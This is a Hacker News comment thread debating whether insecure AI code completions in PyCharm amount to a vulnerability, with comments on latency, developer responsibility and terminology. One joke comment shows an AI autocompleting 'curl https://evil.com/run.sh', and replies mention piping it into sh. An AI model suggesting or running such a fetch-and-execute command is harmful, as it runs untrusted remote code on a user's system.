Remix.run Logo
Are insecure code completions in PyCharm a vulnerability?(sethmlarson.dev)
28 points by 12_throw_away 6 hours ago | 13 comments
hackermanai 22 minutes ago | parent | next [-]

I have this line completion feature in koieditor.com as well, and it's hard to suggest "safe"/good completions at a low latency. Best approach I could think of is a second pass to verify first pass, but adds to latency, or change to better model, which often also impacts latency.

mgc8 an hour ago | parent | prev | next [-]

Maybe not a vulnerability per se, but definitely conducing to ones, as others have noted. However, those completions are quite unfortunate to say the least, thus one would hope JetBrains would endeavour to improve the local (S)LM they're using, or at least offer the user the option to use one of their own, better tuned ones instead?

stephantul 2 hours ago | parent | prev | next [-]

It’s an interesting question: I’d say this is more of a vulnerability creator than the actual vulnerability.

Similar to how using very difficult technologies makes you more likely to create code with vulnerabilities: the technologies are not the vulnerability, but it’s easier to cause them.

sph an hour ago | parent | prev | next [-]

Waiting for the first terminal with AI autocompletion.

  $ curl http<tab>

  $ curl https://evil.com/run.sh
Then you’re just an enter away from causing havoc on your system.
mgc8 an hour ago | parent | next [-]

Well, technically it's not the curl itself that is the problem, but the "| <shell>" coming afterwards that does the damage. So, if the process is somehow broken up into 1) curl <the_script>; 2) analyse <the_script> and 3) only if safe, then execute <the_script> -- then it's not nearly as bad. Of course, that "analyse" step does all the heavy lifting, and if it happens to involve some form of local LLM then... excitement is guaranteed as they say.

chmod775 an hour ago | parent | prev [-]

Still missing the pipe into sh.

ares623 34 minutes ago | parent | next [-]

Good thing that isn't a popular pattern that would make its way into the training data!

sph an hour ago | parent | prev [-]

Ah too late to edit. That is what I meant

marcosdumay 3 hours ago | parent | prev | next [-]

Well, the plugin developers can't really do anything about it.

And it's the one thing the LLM developers have been trying to fix for the last 2 years. Apparently, even at the cost of some other functionality. It's not like they can do it reliably.

chmod775 an hour ago | parent | prev | next [-]

It's only a vulnerability if you absolve humans of responsibility and demote them to "meatbag vehicle for checking in LLM code".

frumplestlatz 2 hours ago | parent | prev | next [-]

What is “monster-in-the-middle” and why is it being used in place of (presumably) “man-in-the-middle”?

Gander5739 2 minutes ago | parent [-]

This came up the other day: https://news.ycombinator.com/item?id=48457158

runningmike 2 hours ago | parent | prev [-]

“ Are insecure code completions a vulnerability?” No it might be a potential security weakness. Semantics matters.

See also: https://nocomplexity.github.io/pythonsecurity/fundamentals/w...